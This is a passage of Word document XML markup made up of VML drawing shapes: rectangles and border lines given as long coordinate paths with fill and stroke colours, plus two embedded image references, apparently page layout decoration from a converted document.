1510,15272,1510,15272,1510,15272,1510,15272,1510,15271,1510,15271,1510,15271,1510,15271,1510,15271,1510,15271,1510,15271,1510,15271,1510,15270,1510,15270,1510,15270,1510,15270,1510,15270,1510,15269,1510,15269,1510,15268,1510,15268,1510,15268,1510,15267,1510,15267,1510,15266,1510,15266,1510,15265,1510,15264,1510,15264,1510,15263,1510,15262,1510,15261,1510,15260,1510,15260,1510,15259,1510,15258,1510,15257,1510,15255,1510,15254,1510,15253,1510,15252,1510,15250,1510,15249,1510,15248,1510,15246,1510,15245,1510,15243,1510,15241,1510,15239,1510,15238,1510,15236,1510,15234,1510,15232,1510,15230,1510,15227,1510,15225,1510,15223,1510,15220,1510,15218,1510,15215,1510,15213,1510,15210,1510,15207,1510,15204,1510,15201,1510,15198,1510,15195,1510,15192,1510,15189,1510,15185,1510,15182,1510,15178,1510,15174,1510,15171,1510,15167,1510,15163,1510,15159,1510,15155,1510,15150,1510,15146,1510,15141,1510,15137,1510,15132,1510,15127,1510,15122,1510,15117,1510,15112,1510,15107,1510,15102,1510,15096,1510,15090,1510,15085,1510,15079,1510,15073,1510,15067,1510,15061,1510,15054,1510,15048,1510,15041,1510,15035,1510,15028,1510,15021,1510,15014,1510,15006,1510,14999,1510,14992,1510,14984,1510,14976,1510,14968,1510,14960,1510,14952,1510,14944,1510,14935,1510,14927e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:745.500pt;width:1.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,14910" coordsize="30,350">
        <v:shape style="position:absolute;left:1490;top:14910;width:30;height:350" coordorigin="1490,14910" coordsize="30,350" path="m1517,14927l1517,14927,1517,14927,1517,14927,1517,14927,1517,14927,1517,14927,1517,14927,1517,14927,1517,14927,1517,14927,1517,14927,1517,14927,1517,14927,1517,14927,1517,14927,1517,14927,1517,14927,1517,14928,1517,14928,1517,14928,1517,14928,1517,14928,1517,14929,1517,14929,1517,14929,1517,14930,1517,14930,1517,14931,1517,14931,1517,14932,1517,14932,1517,14933,1517,14933,1517,14934,1517,14935,1517,14935,1517,14936,1517,14937,1517,14938,1517,14939,1517,14940,1517,14941,1517,14942,1517,14943,1517,14944,1517,14945,1517,14946,1517,14948,1517,14949,1517,14951,1517,14952,1517,14954,1517,14955,1517,14957,1517,14959,1517,14961,1517,14962,1517,14964,1517,14966,1517,14969,1517,14971,1517,14973,1517,14975,1517,14978,1517,14980,1517,14983,1517,14985,1517,14988,1517,14991,1517,14994,1517,14997,1517,15000,1517,15003,1517,15006,1517,15010,1517,15013,1517,15016,1517,15020,1517,15024,1517,15028,1517,15031,1517,15035,1517,15039,1517,15044,1517,15048,1517,15052,1517,15057,1517,15061,1517,15066,1517,15071,1517,15076,1517,15081,1517,15086,1517,15091,1517,15097,1517,15102,1517,15108,1517,15113,1517,15119,1517,15125,1517,15131,1517,15138,1517,15144,1517,15150,1517,15157,1517,15164,1517,15170,1517,15177,1517,15185,1517,15192,1517,15199,1517,15207,1517,15214,1517,15222,1517,15230,1517,15238,1517,15246,1517,15255,1517,15263,1517,15272e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:762.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15250" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:15250;width:8990;height:370" coordorigin="1490,15250" coordsize="8990,370" path="m1510,15272l1510,15272,1510,15272,1510,15272,1510,15272,1510,15272,1510,15272,1511,15272,1512,15272,1512,15272,1514,15272,1515,15272,1517,15272,1519,15272,1521,15272,1524,15272,1528,15272,1532,15272,1536,15272,1541,15272,1546,15272,1552,15272,1559,15272,1566,15272,1575,15272,1583,15272,1593,15272,1603,15272,1615,15272,1627,15272,1640,15272,1654,15272,1668,15272,1684,15272,1701,15272,1719,15272,1738,15272,1758,15272,1780,15272,1802,15272,1826,15272,1851,15272,1877,15272,1904,15272,1933,15272,1963,15272,1995,15272,2028,15272,2063,15272,2099,15272,2136,15272,2175,15272,2216,15272,2259,15272,2303,15272,2348,15272,2396,15272,2445,15272,2496,15272,2549,15272,2604,15272,2660,15272,2719,15272,2779,15272,2841,15272,2906,15272,2972,15272,3041,15272,3112,15272,3184,15272,3259,15272,3336,15272,3416,15272,3498,15272,3582,15272,3668,15272,3757,15272,3848,15272,3941,15272,4037,15272,4136,15272,4236,15272,4340,15272,4446,15272,4555,15272,4666,15272,4780,15272,4897,15272,5017,15272,5139,15272,5264,15272,5392,15272,5523,15272,5657,15272,5793,15272,5933,15272,6076,15272,6222,15272,6370,15272,6522,15272,6677,15272,6835,15272,6997,15272,7161,15272,7329,15272,7500,15272,7675,15272,7853,15272,8034,15272,8219,15272,8407,15272,8598,15272,8793,15272,8992,15272,9194,15272,9400,15272,9609,15272,9823,15272,10039,15272,10260,15272,10484,15272,10484,15272,10484,15272,10484,15272,10484,15272,10484,15272,10484,15272,10484,15272,10484,15272,10484,15272,10484,15272,10484,15272,10484,15272,10484,15272,10484,15272,10484,15272,10484,15272,10484,15273,10484,15273,10484,15273,10484,15273,10484,15273,10484,15274,10484,15274,10484,15274,10484,15275,10484,15275,10484,15275,10484,15276,10484,15276,10484,15277,10484,15277,10484,15278,10484,15279,10484,15279,10484,15280,10484,15281,10484,15282,10484,15283,10484,15283,10484,15284,10484,15285,10484,15286,10484,15288,10484,15289,10484,15290,10484,15291,10484,15292,10484,15294,10484,15295,10484,15297,10484,15298,10484,15300,10484,15302,10484,15304,10484,15305,10484,15307,10484,15309,10484,15311,10484,15313,10484,15316,10484,15318,10484,15320,10484,15323,10484,15325,10484,15328,10484,15330,10484,15333,10484,15336,10484,15339,10484,15342,10484,15345,10484,15348,10484,15351,10484,15355,10484,15358,10484,15362,10484,15366,10484,15369,10484,15373,10484,15377,10484,15381,10484,15385,10484,15390,10484,15394,10484,15398,10484,15403,10484,15408,10484,15412,10484,15417,10484,15422,10484,15428,10484,15433,10484,15438,10484,15444,10484,15449,10484,15455,10484,15461,10484,15467,10484,15473,10484,15479,10484,15485,10484,15492,10484,15499,10484,15505,10484,15512,10484,15519,10484,15526,10484,15534,10484,15541,10484,15548,10484,15556,10484,15564,10484,15572,10484,15580,10484,15588,10484,15597,10484,15605,10484,15614,10484,15623,10484,15632,10484,15632,10484,15632,10484,15632,10484,15632,10484,15632,10484,15632,10483,15632,10482,15632,10482,15632,10480,15632,10479,15632,10477,15632,10475,15632,10473,15632,10470,15632,10466,15632,10462,15632,10458,15632,10453,15632,10448,15632,10442,15632,10435,15632,10428,15632,10419,15632,10411,15632,10401,15632,10391,15632,10379,15632,10367,15632,10354,15632,10340,15632,10326,15632,10310,15632,10293,15632,10275,15632,10256,15632,10236,15632,10215,15632,10192,15632,10168,15632,10143,15632,10117,15632,10090,15632,10061,15632,10031,15632,9999,15632,9966,15632,9931,15632,9895,15632,9858,15632,9819,15632,9778,15632,9735,15632,9691,15632,9646,15632,9598,15632,9549,15632,9498,15632,9445,15632,9391,15632,9334,15632,9275,15632,9215,15632,9153,15632,9088,15632,9022,15632,8953,15632,8883,15632,8810,15632,8735,15632,8658,15632,8578,15632,8497,15632,8413,15632,8326,15632,8238,15632,8146,15632,8053,15632,7957,15632,7859,15632,7758,15632,7654,15632,7548,15632,7439,15632,7328,15632,7214,15632,7097,15632,6977,15632,6855,15632,6730,15632,6602,15632,6471,15632,6337,15632,6201,15632,6061,15632,5918,15632,5773,15632,5624,15632,5472,15632,5317,15632,5159,15632,4997,15632,4833,15632,4665,15632,4494,15632,4319,15632,4141,15632,3960,15632,3776,15632,3587,15632,3396,15632,3201,15632,3002,15632,2800,15632,2594,15632,2385,15632,2172,15632,1955,15632,1734,15632,1510,15632,1510,15632,1510,15632,1510,15632,1510,15632,1510,15632,1510,15632,1510,15632,1510,15632,1510,15632,1510,15632,1510,15632,1510,15632,1510,15632,1510,15631,1510,15631,1510,15631,1510,15631,1510,15631,1510,15631,1510,15630,1510,15630,1510,15630,1510,15630,1510,15629,1510,15629,1510,15629,1510,15628,1510,15628,1510,15627,1510,15627,1510,15626,1510,15626,1510,15625,1510,15624,1510,15623,1510,15623,1510,15622,1510,15621,1510,15620,1510,15619,1510,15618,1510,15617,1510,15616,1510,15615,1510,15614,1510,15612,1510,15611,1510,15610,1510,15608,1510,15607,1510,15605,1510,15604,1510,15602,1510,15600,1510,15598,1510,15596,1510,15594,1510,15592,1510,15590,1510,15588,1510,15586,1510,15583,1510,15581,1510,15578,1510,15576,1510,15573,1510,15570,1510,15568,1510,15565,1510,15562,1510,15559,1510,15555,1510,15552,1510,15549,1510,15545,1510,15542,1510,15538,1510,15534,1510,15530,1510,15526,1510,15522,1510,15518,1510,15514,1510,15510,1510,15505,1510,15501,1510,15496,1510,15491,1510,15486,1510,15481,1510,15476,1510,15471,1510,15465,1510,15460,1510,15454,1510,15449,1510,15443,1510,15437,1510,15431,1510,15424,1510,15418,1510,15412,1510,15405,1510,15398,1510,15391,1510,15384,1510,15377,1510,15370,1510,15363,1510,15355,1510,15347,1510,15340,1510,15332,1510,15323,1510,15315,1510,15307,1510,15298,1510,15290,1510,15281,1510,15272e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:762.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15250" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:15250;width:30;height:370" coordorigin="1490,15250" coordsize="30,370" path="m1517,15272l1517,15272,1517,15272,1517,15272,1517,15272,1517,15272,1517,15272,1517,15272,1517,15272,1517,15272,1517,15272,1517,15272,1517,15272,1517,15272,1517,15272,1517,15272,1517,15272,1517,15273,1517,15273,1517,15273,1517,15273,1517,15273,1517,15274,1517,15274,1517,15274,1517,15275,1517,15275,1517,15275,1517,15276,1517,15276,1517,15277,1517,15277,1517,15278,1517,15279,1517,15279,1517,15280,1517,15281,1517,15282,1517,15283,1517,15283,1517,15284,1517,15285,1517,15286,1517,15288,1517,15289,1517,15290,1517,15291,1517,15292,1517,15294,1517,15295,1517,15297,1517,15298,1517,15300,1517,15302,1517,15304,1517,15305,1517,15307,1517,15309,1517,15311,1517,15313,1517,15316,1517,15318,1517,15320,1517,15323,1517,15325,1517,15328,1517,15330,1517,15333,1517,15336,1517,15339,1517,15342,1517,15345,1517,15348,1517,15351,1517,15355,1517,15358,1517,15362,1517,15366,1517,15369,1517,15373,1517,15377,1517,15381,1517,15385,1517,15390,1517,15394,1517,15398,1517,15403,1517,15408,1517,15412,1517,15417,1517,15422,1517,15428,1517,15433,1517,15438,1517,15444,1517,15449,1517,15455,1517,15461,1517,15467,1517,15473,1517,15479,1517,15485,1517,15492,1517,15499,1517,15505,1517,15512,1517,15519,1517,15526,1517,15534,1517,15541,1517,15548,1517,15556,1517,15564,1517,15572,1517,15580,1517,15588,1517,15597,1517,15605,1517,15614,1517,15623,1517,15632e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:48.600pt;width:467.400pt;height:379.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId19" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:467.400pt;width:467.400pt;height:129.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId20" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:199.500pt;margin-top:679.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3990,13590" coordsize="130,270">
        <v:shape style="position:absolute;left:3990;top:13590;width:130;height:270" coordorigin="3990,13590" coordsize="130,270" path="m4016,13606l4016,13606,4016,13606,4016,13606,4016,13606,4016,13606,4016,13606,4016,13606,4016,13606,4016,13606,4016,13606,4016,13606,4016,13606,4016,13606,4016,13606,4016,13606,4016,13606,4016,13606,4016,13606,4016,13606,4017,13606,4017,13606,4017,13606,4017,13606,4017,13606,4017,13606,4017,13606,4017,13606,4017,13606,4018,13606,4018,13606,4018,13606,4018,13606,4018,13606,4019,13606,4019,13606,4019,13606,4019,13606,4020,13606,4020,13606,4020,13606,4021,13606,4021,13606,4021,13606,4022,13606,4022,13606,4023,13606,4023,13606,4023,13606,4024,13606,4024,13606,4025,13606,4025,13606,4026,13606,4027,13606,4027,13606,4028,13606,4029,13606,4029,13606,4030,13606,4031,13606,4031,13606,4032,13606,4033,13606,4034,13606,4035,13606,4036,13606,4037,13606,4037,13606,4038,13606,4039,13606,4040,13606,4042,13606,4043,13606,4044,13606,4045,13606,4046,13606,4047,13606,4049,13606,4050,13606,4051,13606,4053,13606,4054,13606,4055,13606,4057,13606,4058,13606,4060,13606,4061,13606,4063,13606,4065,13606,4066,13606,4068,13606,4070,13606,4072,13606,4073,13606,4075,13606,4077,13606,4079,13606,4081,13606,4083,13606,4085,13606,4087,13606,4089,13606,4092,13606,4094,13606,4096,13606,4098,13606,4101,13606,4103,13606,4106,13606,4108,13606,4111,13606,4113,13606,4116,13606,4119,13606,4122,13606,4124,13606,4127,13606,4130,13606,4133,13606,4136,13606,4136,13606,4136,13606,4136,13606,4136,13606,4136,13606,4136,13606,4136,13606,4136,13606,4136,13606,4136,13606,4136,13606,4136,13606,4136,13606,4136,13606,4136,13606,4136,13606,4136,13606,4136,13607,4136,13607,4136,13607,4136,13607,4136,13607,4136,13607,4136,13608,4136,13608,4136,13608,4136,13609,4136,13609,4136,13609,4136,13610,4136,13610,4136,13610,4136,13611,4136,13611,4136,13612,4136,13612,4136,13613,4136,13614,4136,13614,4136,13615,4136,13616,4136,13616,4136,13617,4136,13618,4136,13619,4136,13620,4136,13621,4136,13622,4136,13623,4136,13624,4136,13625,4136,13626,4136,13627,4136,13628,4136,13630,4136,13631,4136,13632,4136,13634,4136,13635,4136,13637,4136,13639,4136,13640,4136,13642,4136,13644,4136,13646,4136,13647,4136,13649,4136,13651,4136,13653,4136,13656,4136,13658,4136,13660,4136,13662,4136,13665,4136,13667,4136,13670,4136,13672,4136,13675,4136,13678,4136,13680,4136,13683,4136,13686,4136,13689,4136,13692,4136,13696,4136,13699,4136,13702,4136,13706,4136,13709,4136,13713,4136,13716,4136,13720,4136,13724,4136,13728,4136,13732,4136,13736,4136,13740,4136,13744,4136,13748,4136,13753,4136,13757,4136,13762,4136,13767,4136,13771,4136,13776,4136,13781,4136,13786,4136,13791,4136,13797,4136,13802,4136,13807,4136,13813,4136,13819,4136,13824,4136,13830,4136,13836,4136,13842,4136,13848,4136,13855,4136,13861,4136,13861,4136,13861,4136,13861,4136,13861,4136,13861,4136,13861,4136,13861,4136,13861,4136,13861,4136,13861,4136,13861,4136,13861,4136,13861,4136,13861,4136,13861,4136,13861,4136,13861,4136,13861,4136,13861,4136,13861,4136,13861,4135,13861,4135,13861,4135,13861,4135,13861,4135,13861,4135,13861,4135,13861,4135,13861,4134,13861,4134,13861,4134,13861,4134,13861,4134,13861,4133,13861,4133,13861,4133,13861,4132,13861,4132,13861,4132,13861,4132,13861,4131,13861,4131,13861,4130,13861,4130,13861,4130,13861,4129,13861,4129,13861,4128,13861,4128,13861,4127,13861,4127,13861,4126,13861,4125,13861,4125,13861,4124,13861,4124,13861,4123,13861,4122,13861,4121,13861,4121,13861,4120,13861,4119,13861,4118,13861,4117,13861,4117,13861,4116,13861,4115,13861,4114,13861,4113,13861,4112,13861,4111,13861,4109,13861,4108,13861,4107,13861,4106,13861,4105,13861,4104,13861,4102,13861,4101,13861,4100,13861,4098,13861,4097,13861,4095,13861,4094,13861,4092,13861,4091,13861,4089,13861,4088,13861,4086,13861,4084,13861,4082,13861,4081,13861,4079,13861,4077,13861,4075,13861,4073,13861,4071,13861,4069,13861,4067,13861,4065,13861,4063,13861,4060,13861,4058,13861,4056,13861,4054,13861,4051,13861,4049,13861,4046,13861,4044,13861,4041,13861,4039,13861,4036,13861,4033,13861,4031,13861,4028,13861,4025,13861,4022,13861,4019,13861,4016,13861,4016,13861,4016,13861,4016,13861,4016,13861,4016,13861,4016,13861,4016,13861,4016,13861,4016,13861,4016,13861,4016,13861,4016,13861,4016,13861,4016,13861,4016,13861,4016,13860,4016,13860,4016,13860,4016,13860,4016,13860,4016,13860,4016,13860,4016,13859,4016,13859,4016,13859,4016,13859,4016,13858,4016,13858,4016,13858,4016,13857,4016,13857,4016,13856,4016,13856,4016,13856,4016,13855,4016,13854,4016,13854,4016,13853,4016,13853,4016,13852,4016,13851,4016,13851,4016,13850,4016,13849,4016,13848,4016,13847,4016,13846,4016,13845,4016,13844,4016,13843,4016,13842,4016,13841,4016,13840,4016,13838,4016,13837,4016,13836,4016,13834,4016,13833,4016,13831,4016,13830,4016,13828,4016,13827,4016,13825,4016,13823,4016,13821,4016,13819,4016,13817,4016,13815,4016,13813,4016,13811,4016,13809,4016,13807,4016,13804,4016,13802,4016,13800,4016,13797,4016,13795,4016,13792,4016,13789,4016,13786,4016,13783,4016,13781,4016,13778,4016,13774,4016,13771,4016,13768,4016,13765,4016,13761,4016,13758,4016,13754,4016,13751,4016,13747,4016,13743,4016,13739,4016,13735,4016,13731,4016,13727,4016,13723,4016,13718,4016,13714,4016,13710,4016,13705,4016,13700,4016,13696,4016,13691,4016,13686,4016,13681,4016,13676,4016,13670,4016,13665,4016,13659,4016,13654,4016,13648,4016,13643,4016,13637,4016,13631,4016,13625,4016,13619,4016,13612,4016,13606e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:259.500pt;margin-top:679.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5190,13590" coordsize="130,270">
        <v:shape style="position:absolute;left:5190;top:13590;width:130;height:270" coordorigin="5190,13590" coordsize="130,270" path="m5217,13606l5217,13606,5217,13606,5217,13606,5217,13606,5217,13606,5217,13606,5217,13606,5217,13606,5217,13606,5217,13606,5217,13606,5217,13606,5217,13606,5217,13606,5217,13606,5217,13606,5217,13606,5217,13606,5217,13606,5217,13606,5217,13606,5217,13606,5217,13606,5217,13606,5218,13606,5218,13606,5218,13606,5218,13606,5218,13606,5218,13606,5219,13606,5219,13606,5219,13606,5219,13606,5219,13606,5220,13606,5220,13606,5220,13606,5221,13606,5221,13606,5221,13606,5222,13606,5222,13606,5222,13606,5223,13606,5223,13606,5224,13606,5224,13606,5225,13606,5225,13606,5226,13606,5226,13606,5227,13606,5227,13606,5228,13606,5228,13606,5229,13606,5230,13606,5231,13606,5231,13606,5232,13606,5233,13606,5234,13606,5234,13606,5235,13606,5236,13606,5237,13606,5238,13606,5239,13606,5240,13606,5241,13606,5242,13606,5243,13606,5244,13606,5245,13606,5247,13606,5248,13606,5249,13606,5250,13606,5252,13606,5253,13606,5254,13606,5256,13606,5257,13606,5259,13606,5260,13606,5262,13606,5264,13606,5265,13606,5267,13606,5269,13606,5270,13606,5272,13606,5274,13606,5276,13606,5278,13606,5280,13606,5282,13606,5284,13606,5286,13606,5288,13606,5290,13606,5292,13606,5294,13606,5297,13606,5299,13606,5301,13606,5304,13606,5306,13606,5309,13606,5311,13606,5314,13606,5317,13606,5319,13606,5322,13606,5325,13606,5328,13606,5331,13606,5334,13606,5337,13606,5337,13606,5337,13606,5337,13606,5337,13606,5337,13606,5337,13606,5337,13606,5337,13606,5337,13606,5337,13606,5337,13606,5337,13606,5337,13606,5337,13606,5337,13606,5337,13606,5337,13606,5337,13607,5337,13607,5337,13607,5337,13607,5337,13607,5337,13607,5337,13608,5337,13608,5337,13608,5337,13609,5337,13609,5337,13609,5337,13610,5337,13610,5337,13610,5337,13611,5337,13611,5337,13612,5337,13612,5337,13613,5337,13614,5337,13614,5337,13615,5337,13616,5337,13616,5337,13617,5337,13618,5337,13619,5337,13620,5337,13621,5337,13622,5337,13623,5337,13624,5337,13625,5337,13626,5337,13627,5337,13628,5337,13630,5337,13631,5337,13632,5337,13634,5337,13635,5337,13637,5337,13639,5337,13640,5337,13642,5337,13644,5337,13646,5337,13647,5337,13649,5337,13651,5337,13653,5337,13656,5337,13658,5337,13660,5337,13662,5337,13665,5337,13667,5337,13670,5337,13672,5337,13675,5337,13678,5337,13680,5337,13683,5337,13686,5337,13689,5337,13692,5337,13696,5337,13699,5337,13702,5337,13706,5337,13709,5337,13713,5337,13716,5337,13720,5337,13724,5337,13728,5337,13732,5337,13736,5337,13740,5337,13744,5337,13748,5337,13753,5337,13757,5337,13762,5337,13767,5337,13771,5337,13776,5337,13781,5337,13786,5337,13791,5337,13797,5337,13802,5337,13807,5337,13813,5337,13819,5337,13824,5337,13830,5337,13836,5337,13842,5337,13848,5337,13855,5337,13861,5337,13861,5337,13861,5337,13861,5337,13861,5337,13861,5337,13861,5337,13861,5337,13861,5337,13861,5337,13861,5337,13861,5337,13861,5337,13861,5337,13861,5336,13861,5336,13861,5336,13861,5336,13861,5336,13861,5336,13861,5336,13861,5336,13861,5336,13861,5336,13861,5336,13861,5336,13861,5335,13861,5335,13861,5335,13861,5335,13861,5335,13861,5335,13861,5334,13861,5334,13861,5334,13861,5334,13861,5333,13861,5333,13861,5333,13861,5332,13861,5332,13861,5332,13861,5331,13861,5331,13861,5331,13861,5330,13861,5330,13861,5329,13861,5329,13861,5328,13861,5328,13861,5327,13861,5327,13861,5326,13861,5325,13861,5325,13861,5324,13861,5323,13861,5323,13861,5322,13861,5321,13861,5321,13861,5320,13861,5319,13861,5318,13861,5317,13861,5316,13861,5315,13861,5314,13861,5313,13861,5312,13861,5311,13861,5310,13861,5309,13861,5308,13861,5307,13861,5305,13861,5304,13861,5303,13861,5302,13861,5300,13861,5299,13861,5297,13861,5296,13861,5294,13861,5293,13861,5291,13861,5290,13861,5288,13861,5286,13861,5285,13861,5283,13861,5281,13861,5279,13861,5278,13861,5276,13861,5274,13861,5272,13861,5270,13861,5268,13861,5265,13861,5263,13861,5261,13861,5259,13861,5257,13861,5254,13861,5252,13861,5249,13861,5247,13861,5244,13861,5242,13861,5239,13861,5237,13861,5234,13861,5231,13861,5228,13861,5225,13861,5223,13861,5220,13861,5217,13861,5217,13861,5217,13861,5217,13861,5217,13861,5217,13861,5217,13861,5217,13861,5217,13861,5217,13861,5217,13861,5217,13861,5217,13861,5217,13861,5217,13861,5217,13861,5217,13860,5217,13860,5217,13860,5217,13860,5217,13860,5217,13860,5217,13860,5217,13859,5217,13859,5217,13859,5217,13859,5217,13858,5217,13858,5217,13858,5217,13857,5217,13857,5217,13856,5217,13856,5217,13856,5217,13855,5217,13854,5217,13854,5217,13853,5217,13853,5217,13852,5217,13851,5217,13851,5217,13850,5217,13849,5217,13848,5217,13847,5217,13846,5217,13845,5217,13844,5217,13843,5217,13842,5217,13841,5217,13840,5217,13838,5217,13837,5217,13836,5217,13834,5217,13833,5217,13831,5217,13830,5217,13828,5217,13827,5217,13825,5217,13823,5217,13821,5217,13819,5217,13817,5217,13815,5217,13813,5217,13811,5217,13809,5217,13807,5217,13804,5217,13802,5217,13800,5217,13797,5217,13795,5217,13792,5217,13789,5217,13786,5217,13783,5217,13781,5217,13778,5217,13774,5217,13771,5217,13768,5217,13765,5217,13761,5217,13758,5217,13754,5217,13751,5217,13747,5217,13743,5217,13739,5217,13735,5217,13731,5217,13727,5217,13723,5217,13718,5217,13714,5217,13710,5217,13705,5217,13700,5217,13696,5217,13691,5217,13686,5217,13681,5217,13676,5217,13670,5217,13665,5217,13659,5217,13654,5217,13648,5217,13643,5217,13637,5217,13631,5217,13625,5217,13619,5217,13612,5217,13606e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:385.500pt;margin-top:679.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="7710,13590" coordsize="130,270">
        <v:shape style="position:absolute;left:7710;top:13590;width:130;height:270" coordorigin="7710,13590" coordsize="130,270" path="m7738,13606l7738,13606,7738,13606,7738,13606,7738,13606,7738,13606,7738,13606,7738,13606,7738,13606,7738,13606,7738,13606,7738,13606,7738,13606,7738,13606,7738,13606,7738,13606,7738,13606,7738,13606,7738,13606,7738,13606,7738,13606,7738,13606,7739,13606,7739,13606,7739,13606,7739,13606,7739,13606,7739,13606,7739,13606,7739,13606,7740,13606,7740,13606,7740,13606,7740,13606,7740,13606,7741,13606,7741,13606,7741,13606,7742,13606,7742,13606,7742,13606,7742,13606,7743,13606,7743,13606,7744,13606,7744,13606,7744,13606,7745,13606,7745,13606,7746,13606,7746,13606,7747,13606,7747,13606,7748,13606,7749,13606,7749,13606,7750,13606,7750,13606,7751,13606,7752,13606,7753,13606,7753,13606,7754,13606,7755,13606,7756,13606,7757,13606,7757,13606,7758,13606,7759,13606,7760,13606,7761,13606,7762,13606,7763,13606,7764,13606,7766,13606,7767,13606,7768,13606,7769,13606,7770,13606,7772,13606,7773,13606,7774,13606,7776,13606,7777,13606,7779,13606,7780,13606,7782,13606,7783,13606,7785,13606,7786,13606,7788,13606,7790,13606,7792,13606,7793,13606,7795,13606,7797,13606,7799,13606,7801,13606,7803,13606,7805,13606,7807,13606,7809,13606,7811,13606,7814,13606,7816,13606,7818,13606,7820,13606,7823,13606,7825,13606,7828,13606,7830,13606,7833,13606,7835,13606,7838,13606,7841,13606,7843,13606,7846,13606,7849,13606,7852,13606,7855,13606,7858,13606,7858,13606,7858,13606,7858,13606,7858,13606,7858,13606,7858,13606,7858,13606,7858,13606,7858,13606,7858,13606,7858,13606,7858,13606,7858,13606,7858,13606,7858,13606,7858,13606,7858,13606,7858,13607,7858,13607,7858,13607,7858,13607,7858,13607,7858,13607,7858,13608,7858,13608,7858,13608,7858,13609,7858,13609,7858,13609,7858,13610,7858,13610,7858,13610,7858,13611,7858,13611,7858,13612,7858,13612,7858,13613,7858,13614,7858,13614,7858,13615,7858,13616,7858,13616,7858,13617,7858,13618,7858,13619,7858,13620,7858,13621,7858,13622,7858,13623,7858,13624,7858,13625,7858,13626,7858,13627,7858,13628,7858,13630,7858,13631,7858,13632,7858,13634,7858,13635,7858,13637,7858,13639,7858,13640,7858,13642,7858,13644,7858,13646,7858,13647,7858,13649,7858,13651,7858,13653,7858,13656,7858,13658,7858,13660,7858,13662,7858,13665,7858,13667,7858,13670,7858,13672,7858,13675,7858,13678,7858,13680,7858,13683,7858,13686,7858,13689,7858,13692,7858,13696,7858,13699,7858,13702,7858,13706,7858,13709,7858,13713,7858,13716,7858,13720,7858,13724,7858,13728,7858,13732,7858,13736,7858,13740,7858,13744,7858,13748,7858,13753,7858,13757,7858,13762,7858,13767,7858,13771,7858,13776,7858,13781,7858,13786,7858,13791,7858,13797,7858,13802,7858,13807,7858,13813,7858,13819,7858,13824,7858,13830,7858,13836,7858,13842,7858,13848,7858,13855,7858,13861,7858,13861,7858,13861,7858,13861,7858,13861,7858,13861,7858,13861,7858,13861,7858,13861,7858,13861,7858,13861,7858,13861,7858,13861,7858,13861,7858,13861,7858,13861,7858,13861,7858,13861,7858,13861,7858,13861,7857,13861,7857,13861,7857,13861,7857,13861,7857,13861,7857,13861,7857,13861,7857,13861,7857,13861,7856,13861,7856,13861,7856,13861,7856,13861,7856,13861,7855,13861,7855,13861,7855,13861,7855,13861,7854,13861,7854,13861,7854,13861,7853,13861,7853,13861,7853,13861,7852,13861,7852,13861,7851,13861,7851,13861,7851,13861,7850,13861,7850,13861,7849,13861,7849,13861,7848,13861,7847,13861,7847,13861,7846,13861,7845,13861,7845,13861,7844,13861,7843,13861,7843,13861,7842,13861,7841,13861,7840,13861,7839,13861,7838,13861,7837,13861,7837,13861,7836,13861,7835,13861,7834,13861,7832,13861,7831,13861,7830,13861,7829,13861,7828,13861,7827,13861,7825,13861,7824,13861,7823,13861,7821,13861,7820,13861,7819,13861,7817,13861,7816,13861,7814,13861,7813,13861,7811,13861,7809,13861,7808,13861,7806,13861,7804,13861,7802,13861,7801,13861,7799,13861,7797,13861,7795,13861,7793,13861,7791,13861,7789,13861,7787,13861,7785,13861,7782,13861,7780,13861,7778,13861,7775,13861,7773,13861,7771,13861,7768,13861,7766,13861,7763,13861,7761,13861,7758,13861,7755,13861,7752,13861,7750,13861,7747,13861,7744,13861,7741,13861,7738,13861,7738,13861,7738,13861,7738,13861,7738,13861,7738,13861,7738,13861,7738,13861,7738,13861,7738,13861,7738,13861,7738,13861,7738,13861,7738,13861,7738,13861,7738,13861,7738,13860,7738,13860,7738,13860,7738,13860,7738,13860,7738,13860,7738,13860,7738,13859,7738,13859,7738,13859,7738,13859,7738,13858,7738,13858,7738,13858,7738,13857,7738,13857,7738,13856,7738,13856,7738,13856,7738,13855,7738,13854,7738,13854,7738,13853,7738,13853,7738,13852,7738,13851,7738,13851,7738,13850,7738,13849,7738,13848,7738,13847,7738,13846,7738,13845,7738,13844,7738,13843,7738,13842,7738,1384